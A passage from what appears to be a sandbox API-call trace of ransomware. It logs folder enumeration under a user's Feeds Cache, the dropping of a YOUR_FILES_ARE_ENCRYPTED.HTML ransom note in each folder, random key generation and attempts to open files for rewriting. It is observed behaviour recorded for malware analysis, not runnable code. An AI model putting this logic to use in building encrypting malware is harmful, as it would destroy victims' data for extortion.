hTemplateFile=0x0) returned 0x5a8 [0159.162] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.164] CloseHandle (hObject=0x5a8) returned 1 [0159.164] GetProcessHeap () returned 0x270000 [0159.165] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.180] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\desktop.ini") returned 71 [0159.180] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.180] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.180] lstrlenW (lpString=".ini") returned 4 [0159.180] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="DT1GIE4D", cAlternateFileName="")) returned 1 
[0159.180] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned 68 [0159.180] GetProcessHeap () returned 0x270000 [0159.181] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.181] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D" [0159.181] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*" [0159.181] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a8b533b, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.181] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\desktop.ini") returned 80 [0159.181] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.181] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.181] lstrlenW (lpString=".ini") returned 4 [0159.181] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.181] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.181] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\fwlink[1]") returned 78 [0159.181] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.182] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.182] 
lstrlenW (lpString="") returned 0 [0159.182] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ad2bc83, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.182] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.185] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.185] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\DT1GIE4D\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\dt1gie4d\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.185] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.188] CloseHandle (hObject=0x5a8) returned 1 [0159.188] GetProcessHeap () returned 0x270000 [0159.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.191] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, 
ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="F6GEI81Z", cAlternateFileName="")) returned 1 [0159.191] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned 68 [0159.191] GetProcessHeap () returned 0x270000 [0159.192] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.192] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z" [0159.192] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*" [0159.192] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.192] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: 
lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.193] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\desktop.ini") returned 80 [0159.193] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.193] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.193] lstrlenW (lpString=".ini") returned 4 [0159.193] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.193] wnsprintfW (in: 
pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\fwlink[1]") returned 78 [0159.193] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.193] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.193] lstrlenW (lpString="") returned 0 [0159.193] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.193] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8abd5021, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.193] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.196] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.196] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\F6GEI81Z\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\f6gei81z\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0159.197] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.199] CloseHandle (hObject=0x5a8) returned 1 [0159.199] 
GetProcessHeap () returned 0x270000 [0159.200] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.202] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="GXO2H2PJ", cAlternateFileName="")) returned 1 [0159.202] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned 68 [0159.202] GetProcessHeap () returned 0x270000 [0159.202] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7422068 [0159.202] lstrcpyW (in: lpString1=0x7422068, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ" [0159.202] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*" [0159.202] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, 
ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0159.203] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xd23dc850, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0159.203] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8a88f1db, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0159.203] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\desktop.ini") returned 80 [0159.203] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.204] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.204] lstrlenW (lpString=".ini") returned 4 [0159.204] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0159.204] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, 
ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 1 [0159.204] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\fwlink[1]") returned 78 [0159.204] lstrcmpW (lpString1="fwlink[1]", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.204] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.204] lstrlenW (lpString="") returned 0 [0159.204] PathFindExtensionW (pszPath="fwlink[1]") returned="" [0159.204] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8ab3caa0, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="fwlink[1]", cAlternateFileName="FWLINK~1")) returned 0 [0159.204] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0159.207] wnsprintfW (in: pszDest=0x7422068, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 98 [0159.207] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\GXO2H2PJ\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\gxo2h2pj\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0x5a8 [0159.207] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0159.209] CloseHandle (hObject=0x5a8) returned 1 [0159.210] GetProcessHeap () returned 0x270000 [0159.210] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0159.276] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab7b8200, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 1 [0159.276] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat") returned 69 [0159.276] lstrcmpW (lpString1="index.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0159.276] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0159.276] lstrlenW (lpString=".dat") returned 4 [0159.276] PathFindExtensionW (pszPath="index.dat") returned=".dat" [0159.276] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0159.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\index.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0159.276] FindNextFileW (in: 
hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd25f1b90, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd25f1b90, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xab7b8200, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x60, cFileName="index.dat", cAlternateFileName="")) returned 0 [0159.276] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0159.282] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0159.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Feeds Cache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\feeds cache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0159.284] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0159.286] CloseHandle (hObject=0x4a8) returned 1 [0159.286] GetProcessHeap () returned 0x270000 [0159.287] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0159.288] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf4484640, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xf4484640, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xf4484640, 
